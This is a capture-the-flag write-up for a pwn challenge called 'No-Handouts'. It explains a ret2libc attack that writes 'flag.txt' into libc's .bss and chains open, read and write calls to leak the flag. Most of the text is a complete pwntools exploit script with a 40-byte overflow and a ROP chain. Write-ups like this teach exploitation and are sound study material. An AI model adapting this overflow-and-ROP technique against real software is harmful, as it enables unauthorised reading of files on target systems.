No-Handouts
Ret2Libc except no shell L
We have a libc function leak via system as seen here, challenge hints to no shell (/bin/sh no worky) so we will have to find alternative ways to get the flag.

We can accomplish this with the open, read, write function calls but first, we will need to find a way to write the string flag.txt onto the libc.
Since we have no stack leak and there is PIE enabled, we can consider writing to libc's .bss section and then referencing the pointer to the written address for my open, read, write functions.
Below is the following exploit flow.
Determine cylic offset to override RIP duh
Determine libc base address from leak
Write the string "flag.txt\x00" to libc's .bss data
Call libc's open, read, write functions with the right parameters to read the flag
#!/usr/bin/env python3
from pwn import *
exe = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = exe
offset = 40
def conn():
r = remote('challs.pwnoh.io', 13371)
#r = process('./chall')
r.recvuntil(b"believe me? Try it yourself: it's at ")
system_leak = int(r.recvline().strip(),16)
r.recvline()
system_offset = libc.sym['system']
libc.address = system_leak - system_offset
assert libc.address + system_offset == system_leak
libc_bss_address = libc.bss()
payload = b'A' * offset
rop = ROP(libc) # type: ignore
rop.gets(libc_bss_address)
rop.open(libc_bss_address, 0)
rop.read(3, libc_bss_address, 100)
rop.write(1, libc_bss_address, 100)
payload += rop.chain()
r.clean()
r.sendline(payload)
r.sendline(b'flag.txt\x00')
r.interactive()
def main():
conn()
if __name__ == "__main__":
main()
Last updated